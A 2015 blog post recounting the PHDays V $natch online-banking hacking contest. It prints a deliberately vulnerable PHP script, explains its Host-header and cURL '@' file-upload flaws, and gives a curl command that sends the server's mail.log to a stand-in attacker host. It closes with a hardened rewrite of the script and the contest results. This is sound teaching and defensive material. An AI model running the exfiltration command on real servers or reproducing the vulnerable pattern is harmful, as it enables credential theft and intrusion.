Friday, June 5, 2015

How They Hacked Internet Banking at PHDays V


During Positive Hack Days V, which was held on May 26 and 27 in Moscow, the $natch competition was organized again. It consisted of two rounds. First, the contest's participants were provided with virtual machine copies that contained vulnerable web services of an internet banking system (an analog of a real system). After that, they had to analyze the banking system image and try to transfer money from the bank to their own accounts by exploiting security defects they had detected.

This year's format combined various competitions with CTF (see our blog), and CTF teams were able to take part in them along with the rest of the forum's attendees. Thirty people participated in $natch. The prize money was ramped up to 40,000 rubles (last year it was 20,000).


Technical details

PHDays iBank was developed especially for the contest. It contained vulnerabilities that occur in real banking systems. The system was split into a frontend and a backend that exposed a simple RESTful API, so participants had to study the protocol by which the components of the internet banking system talk to each other.

A typical i-banking system contains logical vulnerabilities (related to weak validation, which causes data leakage) rather than crude security lapses that allow malicious code injection and execution. The contest's banking system mainly contained the former.
PHDays iBank offered 10 banking accounts with seven vulnerability combinations (the more sophisticated the vulnerability is, the more money there was in an account).

Participants could perform such attacks as:

  • brute-force using a list of most common passwords available on the web;
  • hack accounts via bypassing their two-factor authentication;
  • exploit vulnerabilities in password-reset algorithms;
  • experiment with the test script that was used to control API backend performance (validation bypassing, arbitrary file reading);
  • bypass postponed payment protection mechanism (the attack allowed stealing money from other contestants' accounts).

Examples of vulnerabilities

The test script included the following code:

<?php

// Access control rests on the Host header, which the client sets freely
if ($_SERVER['HTTP_HOST'] != 'ibank.dev') {
    exit;
}

if (empty($_GET['url'])) {
    exit;
}

// Only the host and port are taken from the supplied URL; the path is fixed to /status
$parts = parse_url($_GET['url']);
$port = empty($parts['port']) ? '' : ':' . $parts['port'];
$url = "http://{$parts['host']}$port/status";

$ch = curl_init();

curl_setopt_array($ch, [
//    CURLOPT_URL            => $_GET['url'],
    CURLOPT_URL            => $url,
    CURLOPT_HEADER         => false,
    CURLOPT_RETURNTRANSFER => true,
]);

// An array passed as CURLOPT_POSTFIELDS is sent as multipart/form-data, where a
// value beginning with '@' is treated as the path of a local file to upload
if (!empty($_GET['params'])) {
    curl_setopt_array($ch, [
        CURLOPT_POST       => true,
        CURLOPT_POSTFIELDS => $_GET['params']
    ]);
}

var_dump(curl_exec($ch));

curl_close($ch);

The hostname validation was easy to bypass: it compares the Host header, which is supplied by the client, rather than anything the server controls. The second defect is in how the params array is handed to cURL. An array in CURLOPT_POSTFIELDS is sent as a multipart form, and a value that begins with @ is interpreted as the path of a local file to attach. Combining the two, a participant could make the script read a file from the server and post it to a host of their choosing:

curl -H 'Host: ibank.dev' 'http://SERVER_IP/api_test.php?url=http://ATTACKER_IP/&params\[a\]=@/var/www/frontend/data/logs/mail.log'

With the log of sent messages (mail.log) in hand, a participant could read the passwords of accounts that had gone through the password-recovery procedure.
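A hardened version of the same status-check script, added here as an example and not taken from PHDays iBank, shows the two fixes a reviewer would ask for: the decision about who may call the script and which backend it may probe is made from server-side data (the allowlists and the backend hostnames below are assumptions for the example), and the POST body is encoded as a string, so cURL never interprets a value as a file to upload.

```php
<?php
// Added example (not the contest's code): hardened status-check script.
// Same purpose as the original (POST optional params to <host>/status and dump
// the reply), but it closes the two defects exploited during $natch:
//   1. access control derived from the client-supplied Host header;
//   2. the legacy "@/path" file-upload convention in CURLOPT_POSTFIELDS.
// ALLOWED_STATUS_HOSTS and ALLOWED_CLIENT_ADDRS are assumed values for this example.

declare(strict_types=1);

// Backend hosts this script may probe. Decided server-side, never from request data.
const ALLOWED_STATUS_HOSTS = ['backend.ibank.dev', 'backend2.ibank.dev'];

// Clients allowed to run the script, by source address. The Host header is not an
// authentication signal: any client can send 'Host: ibank.dev'.
const ALLOWED_CLIENT_ADDRS = ['127.0.0.1', '::1'];

function resolveStatusUrl(string $rawUrl): ?string
{
    $parts = parse_url($rawUrl);
    if ($parts === false || empty($parts['host'])) {
        return null;
    }
    // Exact match against the allowlist; parse_url returns the host without the port.
    if (!in_array(strtolower($parts['host']), ALLOWED_STATUS_HOSTS, true)) {
        return null;
    }
    $port = isset($parts['port']) ? ':' . (int) $parts['port'] : '';
    return "http://{$parts['host']}{$port}/status";
}

function buildPostBody(array $params): string
{
    // Encode as application/x-www-form-urlencoded ourselves. A string body is never
    // interpreted by cURL as a file upload, so a leading '@' in a value is sent as a
    // literal character instead of attaching a local file. (PHP 5.5 also offers
    // CURLOPT_SAFE_UPLOAD for this; a string body works on every version.)
    return http_build_query($params);
}

if (!in_array($_SERVER['REMOTE_ADDR'] ?? '', ALLOWED_CLIENT_ADDRS, true)) {
    http_response_code(403);
    exit;
}

$url = resolveStatusUrl((string) ($_GET['url'] ?? ''));
if ($url === null) {
    http_response_code(400);
    exit;
}

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL             => $url,
    CURLOPT_HEADER          => false,
    CURLOPT_RETURNTRANSFER  => true,
    CURLOPT_PROTOCOLS       => CURLPROTO_HTTP,  // no file://, gopher://, etc.
    CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP,
    CURLOPT_FOLLOWLOCATION  => false,           // a redirect must not re-target the probe
    CURLOPT_TIMEOUT         => 5,
]);

if (!empty($_GET['params']) && is_array($_GET['params'])) {
    curl_setopt_array($ch, [
        CURLOPT_POST       => true,
        CURLOPT_POSTFIELDS => buildPostBody($_GET['params']),
    ]);
}

var_dump(curl_exec($ch));
curl_close($ch);
```

The allowlist check is deliberately an exact string comparison rather than a suffix or regex match: a pattern such as "ends with ibank.dev" is the kind of validation that the original script's logical bugs grew out of. Restricting CURLOPT_PROTOCOLS and disabling redirects are secondary, but they stop a reachable backend from turning the probe into a request to some other scheme or host.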

To bypass two-factor authentication, participants used a vulnerability that had been described in an article on Sakurity.com. During the contest, it turned out that not all participants were aware of it: some of them were still checking every possible code value, as in the old days.


The battle

Apart from attacking the internet banking system, participants could steal money from other contestants' accounts. More Smoked Leet Chicken chose this method and won the contest, making 15,000 rubles. Stas Povolotsky, who took second place, managed to steal 3,200 rubles from the contest's bank.

It's worth mentioning that RDot detected and exploited the most vulnerabilities. However, the team failed to protect the money it had earned, and More Smoked Leet Chicken took advantage of that and stole the money from RDot's account.

Final scoreboard


Congratulations to the winners!
